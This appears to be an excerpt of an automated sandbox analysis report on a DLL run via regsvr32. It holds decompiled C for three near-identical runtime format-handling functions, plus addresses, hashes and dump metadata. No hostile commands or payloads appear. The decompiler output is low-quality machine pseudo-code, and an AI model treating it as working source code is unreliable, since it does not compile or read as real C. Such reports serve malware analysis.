                                                                                                    0x180020227
                                                                                                    0x180020235
                                                                                                    0x18002023a
                                                                                                    0x180020240
                                                                                                    0x18002024d
                                                                                                    0x180020256
                                                                                                    0x180020261
                                                                                                    0x180020271
                                                                                                    0x180020274
                                                                                                    0x180020279
                                                                                                    0x180020284
                                                                                                    0x18002028c
                                                                                                    0x180020291
                                                                                                    0x18002029a
                                                                                                    0x1800202a4
                                                                                                    0x1800202ad
                                                                                                    0x1800202b8
                                                                                                    0x1800202bd
                                                                                                    0x1800202c6
                                                                                                    0x1800202f8

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: bcf1e73d7551d64e90bfa156a206bb1a685ecf705ae5409e00e433787bb9c582
                                                                                                    • Instruction ID: 8713b19af4a9cb3a37663647ad96d725765d0a40a1f113fa106df158d66e4d24
                                                                                                    • Opcode Fuzzy Hash: bcf1e73d7551d64e90bfa156a206bb1a685ecf705ae5409e00e433787bb9c582
                                                                                                    • Instruction Fuzzy Hash: 2F81F03221074886FAFB8A2594847EE27A0E789BC4F749512FD058B797CF25CA5ED700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800205DC Relevance: 1.5, Strings: 1, Instructions: 219COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 57%
                                                                                                    			E000000011800205DC(long long __rbx, long long __rcx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				short _v52;
				short _v56;
				long long _v72;
				void* __rdi;
				signed int _t72;
				void* _t74;
				void* _t116;
				unsigned int _t117;
				signed short _t118;
				unsigned int _t119;
				signed char _t126;
				void* _t131;
				void* _t136;
				void* _t137;
				void* _t138;
				signed long long _t176;
				void* _t191;
				void* _t193;
				signed long long _t194;
				intOrPtr* _t200;
				void* _t202;
				signed long long _t203;
				void* _t205;
				void* _t210;
				signed long long _t213;

				_t197 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t203 = _t202 - 0x40;
				_t176 =  *0x8005d010; // 0xb03f6156e10
				_v48 = _t176 ^ _t203;
				_t72 =  *(__rcx + 0x42) & 0x0000ffff;
				_t6 = _t197 - 0x17; // 0x41
				_t137 = _t6;
				_t7 = _t197 - 0x57; // 0x1
				r15d = _t7;
				_t138 = _t72 - 0x64;
				if (_t138 > 0) goto 0x8002067a;
				if (_t138 == 0) goto 0x800206eb;
				if (_t72 == _t137) goto 0x800206fe;
				if (_t72 == 0x43) goto 0x80020664;
				if (_t72 - 0x44 <= 0) goto 0x80020707;
				if (_t72 - 0x47 <= 0) goto 0x800206fe;
				if (_t72 == 0x53) goto 0x800206a7;
				if (_t72 == 0x58) goto 0x800206bc;
				if (_t72 == 0x5a) goto 0x80020670;
				if (_t72 == 0x61) goto 0x800206fe;
				if (_t72 != 0x63) goto 0x80020707;
				E0000000118002371C(_t72 - 0x63, __rcx, __rcx, __rsi);
				goto 0x80020703;
				_t74 = E000000011800212F4(__rcx, __rcx, _t197);
				goto 0x80020703;
				if (_t74 - 0x67 <= 0) goto 0x800206fe;
				if (_t74 == 0x69) goto 0x800206eb;
				if (_t74 == 0x6e) goto 0x800206e4;
				if (_t74 == 0x6f) goto 0x800206c6;
				if (_t74 == 0x70) goto 0x800206ae;
				if (_t74 == 0x73) goto 0x800206a7;
				if (_t74 == 0x75) goto 0x800206ef;
				if (_t74 != 0x78) goto 0x80020707;
				goto 0x800206f4;
				E000000011800262CC(_t116, __rcx, __rcx, _t197);
				goto 0x80020703;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x800206f7;
				_t117 =  *(__rcx + 0x30);
				if ((r15b & _t117 >> 0x00000005) == 0) goto 0x800206da;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t117;
				goto 0x800206f4;
				E000000011800257A8(__rcx, __rcx, _t191, _t197);
				goto 0x80020703;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00000001180024BF4(0xa, __rcx, _t205, _t210);
				goto 0x80020703;
				if (E00000001180022C28(_t131, _t176 ^ _t203, __rcx, __rcx, _t193, _t197, __rbp, _t205) != 0) goto 0x8002070e;
				goto 0x8002087a;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x80020877;
				_t126 =  *(__rcx + 0x30);
				_v56 = 0;
				_v52 = 0;
				_t21 = _t193 + 0x20; // 0x20
				r13d = _t21;
				if ((r15b & 0) == 0) goto 0x80020768;
				if ((r15b & 0) == 0) goto 0x8002074a;
				_t26 = _t193 + 0x2d; // 0x2d
				_v56 = _t26;
				goto 0x80020765;
				if ((r15b & _t126) == 0) goto 0x80020756;
				goto 0x80020743;
				if ((r15b & 0) == 0) goto 0x80020768;
				_v56 = r13w;
				_t194 = _t213;
				_t118 =  *(__rcx + 0x42) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t118 & 0x0000ffff) - 0x00000058) != 0) goto 0x8002078d;
				if ((r15b & 0) == 0) goto 0x8002078d;
				r8b = r15b;
				goto 0x80020790;
				r8b = 0;
				r12d = 0x30;
				if (r8b != 0) goto 0x800207ac;
				if (0 == 0) goto 0x800207db;
				 *((intOrPtr*)(_t203 + 0x30 + _t194 * 2)) = r12w;
				if (_t118 == 0x58) goto 0x800207c3;
				if (_t118 == _t137) goto 0x800207c3;
				goto 0x800207c6;
				asm("sbb al, al");
				 *((short*)(_t203 + 0x30 + (_t194 + _t213) * 2)) = ( ~r15b & 0x000000e0) + 0x78;
				_t136 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t126 & 0x0000000c) != 0) goto 0x800207fe;
				r8d = _t136;
				E000000011800177DC(( ~r15b & 0x000000e0) + 0x78, r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, __rcx + 0x28);
				_t200 = __rcx + 0x28;
				_v72 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E00000001180028B1C(_t137, __rcx, __rcx + 0x468, _t197, _t200, _t200);
				_t119 =  *(__rcx + 0x30);
				if ((r15b & _t119 >> 0x00000003) == 0) goto 0x8002084b;
				if ((r15b & _t119 >> 0x00000002) != 0) goto 0x8002084b;
				r8d = _t136;
				E000000011800177DC(_t119 >> 3, r12b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t200);
				E0000000118002876C(__rcx, __rcx, _t197, _t200);
				if ( *_t200 < 0) goto 0x80020877;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x80020877;
				r8d = _t136;
				E000000011800177DC( *(__rcx + 0x30) >> 2, r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t200);
				return E000000011800010E0(r15b, _t119 >> 2, _v48 ^ _t203);
			}






























                                                                                                    0x1800205dc
                                                                                                    0x1800205dc
                                                                                                    0x1800205e1
                                                                                                    0x1800205e6
                                                                                                    0x1800205f4
                                                                                                    0x1800205f8
                                                                                                    0x180020602
                                                                                                    0x180020607
                                                                                                    0x180020613
                                                                                                    0x180020613
                                                                                                    0x180020616
                                                                                                    0x180020616
                                                                                                    0x18002061a
                                                                                                    0x18002061d
                                                                                                    0x18002061f
                                                                                                    0x180020627
                                                                                                    0x180020630
                                                                                                    0x180020635
                                                                                                    0x18002063e
                                                                                                    0x180020647
                                                                                                    0x18002064b
                                                                                                    0x180020650
                                                                                                    0x180020655
                                                                                                    0x18002065e
                                                                                                    0x180020666
                                                                                                    0x18002066b
                                                                                                    0x180020670
                                                                                                    0x180020675
                                                                                                    0x18002067d
                                                                                                    0x180020682
                                                                                                    0x180020687
                                                                                                    0x18002068c
                                                                                                    0x180020691
                                                                                                    0x180020696
                                                                                                    0x18002069b
                                                                                                    0x1800206a0
                                                                                                    0x1800206a5
                                                                                                    0x1800206a7
                                                                                                    0x1800206ac
                                                                                                    0x1800206ae
                                                                                                    0x1800206b5
                                                                                                    0x1800206bc
                                                                                                    0x1800206c4
                                                                                                    0x1800206c6
                                                                                                    0x1800206d1
                                                                                                    0x1800206d3
                                                                                                    0x1800206d7
                                                                                                    0x1800206e2
                                                                                                    0x1800206e4
                                                                                                    0x1800206e9
                                                                                                    0x1800206eb
                                                                                                    0x1800206f4
                                                                                                    0x1800206f7
                                                                                                    0x1800206fc
                                                                                                    0x180020705
                                                                                                    0x180020709
                                                                                                    0x180020712
                                                                                                    0x180020718
                                                                                                    0x18002071d
                                                                                                    0x180020723
                                                                                                    0x18002072d
                                                                                                    0x18002072d
                                                                                                    0x180020734
                                                                                                    0x18002073e
                                                                                                    0x180020740
                                                                                                    0x180020743
                                                                                                    0x180020748
                                                                                                    0x18002074d
                                                                                                    0x180020754
                                                                                                    0x18002075d
                                                                                                    0x18002075f
                                                                                                    0x180020765
                                                                                                    0x180020768
                                                                                                    0x18002076c
                                                                                                    0x18002077c
                                                                                                    0x180020786
                                                                                                    0x180020788
                                                                                                    0x18002078b
                                                                                                    0x18002078d
                                                                                                    0x180020793
                                                                                                    0x1800207a6
                                                                                                    0x1800207aa
                                                                                                    0x1800207ac
                                                                                                    0x1800207b8
                                                                                                    0x1800207bd
                                                                                                    0x1800207c1
                                                                                                    0x1800207c8
                                                                                                    0x1800207d3
                                                                                                    0x1800207e1
                                                                                                    0x1800207e6
                                                                                                    0x1800207ec
                                                                                                    0x1800207f9
                                                                                                    0x180020802
                                                                                                    0x18002080d
                                                                                                    0x18002081d
                                                                                                    0x180020820
                                                                                                    0x180020825
                                                                                                    0x180020830
                                                                                                    0x180020838
                                                                                                    0x18002083d
                                                                                                    0x180020846
                                                                                                    0x180020850
                                                                                                    0x180020859
                                                                                                    0x180020864
                                                                                                    0x180020869
                                                                                                    0x180020872
                                                                                                    0x1800208a4

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: 5f0ce9e0402a7ebed759ba15c9910e442b0aa47d5a66dcc84cd6adc40acff38f
                                                                                                    • Instruction ID: a0456f7b08e0b23c91540f978c3d6cee31b27009a12c3b6870f72a00f7bb9085
                                                                                                    • Opcode Fuzzy Hash: 5f0ce9e0402a7ebed759ba15c9910e442b0aa47d5a66dcc84cd6adc40acff38f
                                                                                                    • Instruction Fuzzy Hash: DE81383571434986FAE78A2590447EE23A0E78CBC4F349512FD4597A97CF35CA4EDB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001F7B8 Relevance: 1.5, Strings: 1, Instructions: 219COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E0000000118001F7B8(long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				short _v52;
				char _v56;
				long long _v72;
				void* __rdi;
				signed int _t72;
				void* _t74;
				void* _t116;
				unsigned int _t117;
				signed short _t118;
				unsigned int _t119;
				signed char _t126;
				void* _t131;
				void* _t136;
				void* _t137;
				void* _t138;
				signed long long _t176;
				void* _t191;
				void* _t193;
				signed long long _t194;
				intOrPtr* _t200;
				void* _t202;
				signed long long _t203;
				void* _t205;
				void* _t210;
				signed long long _t213;

				_t197 = __rsi;
				_t191 = __rdx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t203 = _t202 - 0x40;
				_t176 =  *0x8005d010; // 0xb03f6156e10
				_v48 = _t176 ^ _t203;
				_t72 =  *(__rcx + 0x42) & 0x0000ffff;
				_t6 = _t197 - 0x17; // 0x41
				_t137 = _t6;
				_t7 = _t197 - 0x57; // 0x1
				r15d = _t7;
				_t138 = _t72 - 0x64;
				if (_t138 > 0) goto 0x8001f856;
				if (_t138 == 0) goto 0x8001f8c7;
				if (_t72 == _t137) goto 0x8001f8da;
				if (_t72 == 0x43) goto 0x8001f840;
				if (_t72 - 0x44 <= 0) goto 0x8001f8e3;
				if (_t72 - 0x47 <= 0) goto 0x8001f8da;
				if (_t72 == 0x53) goto 0x8001f883;
				if (_t72 == 0x58) goto 0x8001f898;
				if (_t72 == 0x5a) goto 0x8001f84c;
				if (_t72 == 0x61) goto 0x8001f8da;
				if (_t72 != 0x63) goto 0x8001f8e3;
				E0000000118002338C(_t72 - 0x63, __rcx, __rcx, __rsi);
				goto 0x8001f8df;
				_t74 = E00000001180021034(__rcx, __rcx, _t197);
				goto 0x8001f8df;
				if (_t74 - 0x67 <= 0) goto 0x8001f8da;
				if (_t74 == 0x69) goto 0x8001f8c7;
				if (_t74 == 0x6e) goto 0x8001f8c0;
				if (_t74 == 0x6f) goto 0x8001f8a2;
				if (_t74 == 0x70) goto 0x8001f88a;
				if (_t74 == 0x73) goto 0x8001f883;
				if (_t74 == 0x75) goto 0x8001f8cb;
				if (_t74 != 0x78) goto 0x8001f8e3;
				goto 0x8001f8d0;
				E00000001180025EB4(_t116, __rcx, __rcx, _t197);
				goto 0x8001f8df;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001f8d3;
				_t117 =  *(__rcx + 0x30);
				if ((r15b & _t117 >> 0x00000005) == 0) goto 0x8001f8b6;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t117;
				goto 0x8001f8d0;
				E0000000118002530C(__rcx, __rcx, _t191, _t197);
				goto 0x8001f8df;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E0000000118002430C(0xa, __rcx, _t205, _t210);
				goto 0x8001f8df;
				if (E0000000118002207C(_t131, _t176 ^ _t203, __rcx, __rcx, _t193, _t197, __rbp, _t205) != 0) goto 0x8001f8ea;
				goto 0x8001fa56;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x8001fa53;
				_t126 =  *(__rcx + 0x30);
				_v56 = 0;
				_v52 = 0;
				_t21 = _t193 + 0x20; // 0x20
				r13d = _t21;
				if ((r15b & 0) == 0) goto 0x8001f944;
				if ((r15b & 0) == 0) goto 0x8001f926;
				_t26 = _t193 + 0x2d; // 0x2d
				_v56 = _t26;
				goto 0x8001f941;
				if ((r15b & _t126) == 0) goto 0x8001f932;
				goto 0x8001f91f;
				if ((r15b & 0) == 0) goto 0x8001f944;
				_v56 = r13w;
				_t194 = _t213;
				_t118 =  *(__rcx + 0x42) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t118 & 0x0000ffff) - 0x00000058) != 0) goto 0x8001f969;
				if ((r15b & 0) == 0) goto 0x8001f969;
				r8b = r15b;
				goto 0x8001f96c;
				r8b = 0;
				r12d = 0x30;
				if (r8b != 0) goto 0x8001f988;
				if (0 == 0) goto 0x8001f9b7;
				 *((intOrPtr*)(_t203 + 0x30 + _t194 * 2)) = r12w;
				if (_t118 == 0x58) goto 0x8001f99f;
				if (_t118 == _t137) goto 0x8001f99f;
				goto 0x8001f9a2;
				asm("sbb al, al");
				 *((short*)(_t203 + 0x30 + (_t194 + _t213) * 2)) = ( ~r15b & 0x000000e0) + 0x78;
				_t136 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t126 & 0x0000000c) != 0) goto 0x8001f9da;
				r8d = _t136;
				E000000011800176F0(r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t197, __rbp, __rcx + 0x28);
				_t200 = __rcx + 0x28;
				_v72 =  *((intOrPtr*)(__rcx + 0x10));
				_t58 =  &_v56; // 0x60
				r8d = 0;
				E00000001180028954(__rcx, __rcx + 0x468, _t58, _t197, _t200, _t200);
				_t119 =  *(__rcx + 0x30);
				if ((r15b & _t119 >> 0x00000003) == 0) goto 0x8001fa27;
				if ((r15b & _t119 >> 0x00000002) != 0) goto 0x8001fa27;
				r8d = _t136;
				E000000011800176F0(r12b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t197, _t200, _t200);
				E000000011800282C8(__rcx, __rcx, _t200);
				if ( *_t200 < 0) goto 0x8001fa53;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x8001fa53;
				r8d = _t136;
				E000000011800176F0(r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t197, _t200, _t200);
				return E000000011800010E0(r15b, _t119 >> 2, _v48 ^ _t203);
			}






























                                                                                                    0x18001f7b8
                                                                                                    0x18001f7b8
                                                                                                    0x18001f7b8
                                                                                                    0x18001f7bd
                                                                                                    0x18001f7c2
                                                                                                    0x18001f7d0
                                                                                                    0x18001f7d4
                                                                                                    0x18001f7de
                                                                                                    0x18001f7e3
                                                                                                    0x18001f7ef
                                                                                                    0x18001f7ef
                                                                                                    0x18001f7f2
                                                                                                    0x18001f7f2
                                                                                                    0x18001f7f6
                                                                                                    0x18001f7f9
                                                                                                    0x18001f7fb
                                                                                                    0x18001f803
                                                                                                    0x18001f80c
                                                                                                    0x18001f811
                                                                                                    0x18001f81a
                                                                                                    0x18001f823
                                                                                                    0x18001f827
                                                                                                    0x18001f82c
                                                                                                    0x18001f831
                                                                                                    0x18001f83a
                                                                                                    0x18001f842
                                                                                                    0x18001f847
                                                                                                    0x18001f84c
                                                                                                    0x18001f851
                                                                                                    0x18001f859
                                                                                                    0x18001f85e
                                                                                                    0x18001f863
                                                                                                    0x18001f868
                                                                                                    0x18001f86d
                                                                                                    0x18001f872
                                                                                                    0x18001f877
                                                                                                    0x18001f87c
                                                                                                    0x18001f881
                                                                                                    0x18001f883
                                                                                                    0x18001f888
                                                                                                    0x18001f88a
                                                                                                    0x18001f891
                                                                                                    0x18001f898
                                                                                                    0x18001f8a0
                                                                                                    0x18001f8a2
                                                                                                    0x18001f8ad
                                                                                                    0x18001f8af
                                                                                                    0x18001f8b3
                                                                                                    0x18001f8be
                                                                                                    0x18001f8c0
                                                                                                    0x18001f8c5
                                                                                                    0x18001f8c7
                                                                                                    0x18001f8d0
                                                                                                    0x18001f8d3
                                                                                                    0x18001f8d8
                                                                                                    0x18001f8e1
                                                                                                    0x18001f8e5
                                                                                                    0x18001f8ee
                                                                                                    0x18001f8f4
                                                                                                    0x18001f8f9
                                                                                                    0x18001f8ff
                                                                                                    0x18001f909
                                                                                                    0x18001f909
                                                                                                    0x18001f910
                                                                                                    0x18001f91a
                                                                                                    0x18001f91c
                                                                                                    0x18001f91f
                                                                                                    0x18001f924
                                                                                                    0x18001f929
                                                                                                    0x18001f930
                                                                                                    0x18001f939
                                                                                                    0x18001f93b
                                                                                                    0x18001f941
                                                                                                    0x18001f944
                                                                                                    0x18001f948
                                                                                                    0x18001f958
                                                                                                    0x18001f962
                                                                                                    0x18001f964
                                                                                                    0x18001f967
                                                                                                    0x18001f969
                                                                                                    0x18001f96f
                                                                                                    0x18001f982
                                                                                                    0x18001f986
                                                                                                    0x18001f988
                                                                                                    0x18001f994
                                                                                                    0x18001f999
                                                                                                    0x18001f99d
                                                                                                    0x18001f9a4
                                                                                                    0x18001f9af
                                                                                                    0x18001f9bd
                                                                                                    0x18001f9c2
                                                                                                    0x18001f9c8
                                                                                                    0x18001f9d5
                                                                                                    0x18001f9de
                                                                                                    0x18001f9e9
                                                                                                    0x18001f9f1
                                                                                                    0x18001f9f9
                                                                                                    0x18001f9fc
                                                                                                    0x18001fa01
                                                                                                    0x18001fa0c
                                                                                                    0x18001fa14
                                                                                                    0x18001fa19
                                                                                                    0x18001fa22
                                                                                                    0x18001fa2c
                                                                                                    0x18001fa35
                                                                                                    0x18001fa40
                                                                                                    0x18001fa45
                                                                                                    0x18001fa4e
                                                                                                    0x18001fa80

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                    • Opcode ID: 78e62d6d6ddcc2394ab0e40992e8095350a9fb62bedd061c3f05c71c4bd64d80
                                                                                                    • Instruction ID: 0c1f661dd62599151247f93c4d948efe472c2bd2d785553f19c63ce49d3c6262
                                                                                                    • Opcode Fuzzy Hash: 78e62d6d6ddcc2394ab0e40992e8095350a9fb62bedd061c3f05c71c4bd64d80
                                                                                                    • Instruction Fuzzy Hash: C781FD32210A4886EBFA9A2590407FE23A0EB4DBC8F549512FD45977DACF39CB4ED701
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001FD64 Relevance: 1.5, Strings: 1, Instructions: 219COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E0000000118001FD64(long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				short _v52;
				char _v56;
				long long _v72;
				void* __rdi;
				signed int _t72;
				void* _t74;
				void* _t116;
				unsigned int _t117;
				signed short _t118;
				unsigned int _t119;
				signed char _t126;
				void* _t131;
				void* _t136;
				void* _t137;
				void* _t138;
				signed long long _t176;
				void* _t191;
				void* _t193;
				signed long long _t194;
				intOrPtr* _t200;
				void* _t202;
				signed long long _t203;
				void* _t205;
				void* _t210;
				signed long long _t213;

				_t197 = __rsi;
				_t191 = __rdx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t203 = _t202 - 0x40;
				_t176 =  *0x8005d010; // 0xb03f6156e10
				_v48 = _t176 ^ _t203;
				_t72 =  *(__rcx + 0x42) & 0x0000ffff;
				_t6 = _t197 - 0x17; // 0x41
				_t137 = _t6;
				_t7 = _t197 - 0x57; // 0x1
				r15d = _t7;
				_t138 = _t72 - 0x64;
				if (_t138 > 0) goto 0x8001fe02;
				if (_t138 == 0) goto 0x8001fe73;
				if (_t72 == _t137) goto 0x8001fe86;
				if (_t72 == 0x43) goto 0x8001fdec;
				if (_t72 - 0x44 <= 0) goto 0x8001fe8f;
				if (_t72 - 0x47 <= 0) goto 0x8001fe86;
				if (_t72 == 0x53) goto 0x8001fe2f;
				if (_t72 == 0x58) goto 0x8001fe44;
				if (_t72 == 0x5a) goto 0x8001fdf8;
				if (_t72 == 0x61) goto 0x8001fe86;
				if (_t72 != 0x63) goto 0x8001fe8f;
				E00000001180023500(_t72 - 0x63, __rcx, __rcx, __rsi);
				goto 0x8001fe8b;
				_t74 = E00000001180021154(__rcx, __rcx, _t197);
				goto 0x8001fe8b;
				if (_t74 - 0x67 <= 0) goto 0x8001fe86;
				if (_t74 == 0x69) goto 0x8001fe73;
				if (_t74 == 0x6e) goto 0x8001fe6c;
				if (_t74 == 0x6f) goto 0x8001fe4e;
				if (_t74 == 0x70) goto 0x8001fe36;
				if (_t74 == 0x73) goto 0x8001fe2f;
				if (_t74 == 0x75) goto 0x8001fe77;
				if (_t74 != 0x78) goto 0x8001fe8f;
				goto 0x8001fe7c;
				E0000000118002605C(_t116, __rcx, __rcx, _t197);
				goto 0x8001fe8b;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001fe7f;
				_t117 =  *(__rcx + 0x30);
				if ((r15b & _t117 >> 0x00000005) == 0) goto 0x8001fe62;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t117;
				goto 0x8001fe7c;
				E000000011800254EC(__rcx, __rcx, _t191, _t197);
				goto 0x8001fe8b;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E000000011800246B0(0xa, __rcx, _t205, _t210);
				goto 0x8001fe8b;
				if (E00000001180022530(_t131, _t176 ^ _t203, __rcx, __rcx, _t193, _t197, __rbp, _t205) != 0) goto 0x8001fe96;
				goto 0x80020002;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x8001ffff;
				_t126 =  *(__rcx + 0x30);
				_v56 = 0;
				_v52 = 0;
				_t21 = _t193 + 0x20; // 0x20
				r13d = _t21;
				if ((r15b & 0) == 0) goto 0x8001fef0;
				if ((r15b & 0) == 0) goto 0x8001fed2;
				_t26 = _t193 + 0x2d; // 0x2d
				_v56 = _t26;
				goto 0x8001feed;
				if ((r15b & _t126) == 0) goto 0x8001fede;
				goto 0x8001fecb;
				if ((r15b & 0) == 0) goto 0x8001fef0;
				_v56 = r13w;
				_t194 = _t213;
				_t118 =  *(__rcx + 0x42) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t118 & 0x0000ffff) - 0x00000058) != 0) goto 0x8001ff15;
				if ((r15b & 0) == 0) goto 0x8001ff15;
				r8b = r15b;
				goto 0x8001ff18;
				r8b = 0;
				r12d = 0x30;
				if (r8b != 0) goto 0x8001ff34;
				if (0 == 0) goto 0x8001ff63;
				 *((intOrPtr*)(_t203 + 0x30 + _t194 * 2)) = r12w;
				if (_t118 == 0x58) goto 0x8001ff4b;
				if (_t118 == _t137) goto 0x8001ff4b;
				goto 0x8001ff4e;
				asm("sbb al, al");
				 *((short*)(_t203 + 0x30 + (_t194 + _t213) * 2)) = ( ~r15b & 0x000000e0) + 0x78;
				_t136 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t126 & 0x0000000c) != 0) goto 0x8001ff86;
				r8d = _t136;
				E000000011800176F0(r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t197, __rbp, __rcx + 0x28);
				_t200 = __rcx + 0x28;
				_v72 =  *((intOrPtr*)(__rcx + 0x10));
				_t58 =  &_v56; // 0x60
				r8d = 0;
				E00000001180028954(__rcx, __rcx + 0x468, _t58, _t197, _t200, _t200);
				_t119 =  *(__rcx + 0x30);
				if ((r15b & _t119 >> 0x00000003) == 0) goto 0x8001ffd3;
				if ((r15b & _t119 >> 0x00000002) != 0) goto 0x8001ffd3;
				r8d = _t136;
				E000000011800176F0(r12b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t197, _t200, _t200);
				E000000011800284A0(__rcx, __rcx, _t200);
				if ( *_t200 < 0) goto 0x8001ffff;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x8001ffff;
				r8d = _t136;
				E000000011800176F0(r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t197, _t200, _t200);
				return E000000011800010E0(r15b, _t119 >> 2, _v48 ^ _t203);
			}






























                                                                                                    0x18001fd64
                                                                                                    0x18001fd64
                                                                                                    0x18001fd64
                                                                                                    0x18001fd69
                                                                                                    0x18001fd6e
                                                                                                    0x18001fd7c
                                                                                                    0x18001fd80
                                                                                                    0x18001fd8a
                                                                                                    0x18001fd8f
                                                                                                    0x18001fd9b
                                                                                                    0x18001fd9b
                                                                                                    0x18001fd9e
                                                                                                    0x18001fd9e
                                                                                                    0x18001fda2
                                                                                                    0x18001fda5
                                                                                                    0x18001fda7
                                                                                                    0x18001fdaf
                                                                                                    0x18001fdb8
                                                                                                    0x18001fdbd
                                                                                                    0x18001fdc6
                                                                                                    0x18001fdcf
                                                                                                    0x18001fdd3
                                                                                                    0x18001fdd8
                                                                                                    0x18001fddd
                                                                                                    0x18001fde6
                                                                                                    0x18001fdee
